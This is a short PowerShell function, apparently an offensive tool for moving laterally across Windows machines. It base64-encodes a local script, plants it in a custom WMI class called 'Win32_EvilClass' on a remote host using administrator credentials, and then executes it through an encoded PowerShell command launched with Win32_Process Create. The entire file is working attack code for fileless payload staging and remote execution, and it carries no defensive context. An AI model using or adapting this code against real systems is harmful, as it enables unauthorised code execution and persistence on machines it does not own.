  1. function Send-And-Execute {
  2.  
  3. param(
  4. [string]$Username,
  5. [string]$Password,
  6. [string]$IP,
  7. [string]$LocalPath
  8.  
  9. )
  10.  
  11. # Run from 10.1.0.2 to transfer a file to 10.1.0.1.
  12. #$localpath = 'C:\Users\Administrator\Desktop\test.ps1'
  13. #$bytes = [IO.File]::ReadAllBytes($localpath)
  14. $bytes = Get-Content $LocalPath -Raw
  15. $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($bytes))
  16.  
  17. $opts = New-Object Management.ConnectionOptions
  18. $opts.Username = $Username
  19. $opts.Password = $Password
  20. $opts.EnablePrivileges = $true
  21.  
  22. $conn = New-Object Management.ManagementScope
  23. $conn.Path = "\\$IP\root\default"
  24. $conn.Options = $opts
  25. $conn.Connect()
  26.  
  27. $evilclass = New-Object Management.ManagementClass($conn, [String]::Empty, $null)
  28. $evilclass['__CLASS'] = 'Win32_EvilClass'
  29. $evilclass.Properties.Add('EvilProperty', [Management.CimType]::String, $False)
  30. $evilClass.Properties['EvilProperty'].Value = $encoded
  31. $evilclass.Put()
  32.  
  33. $secure_pass = ConvertTo-SecureString $Password -AsPlainText -Force
  34. $creds = New-Object System.Management.Automation.PSCredential($Username, $secure_pass)
  35. #$creds = Get-Credential '10.1.0.2\Administrator'
  36.  
  37. $args = @{
  38. Credential = $creds
  39. ComputerName = '10.1.0.2'
  40. }
  41.  
  42. $payload = @'
  43. $encodedFile = ([WmiClass]'root\default:Win32_EvilClass').Properties['EvilProperty'].Value
  44. Invoke-Command -ScriptBlock {powershell -NoProfile -EncodedCommand $encodedFile}
  45. '@
  46.  
  47. $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
  48. $power = "powershell -NoProfile -EncodedCommand $encodedPayload"
  49.  
  50. Invoke-WmiMethod @args -Class Win32_Process -Name Create -ArgumentList $power
  51. }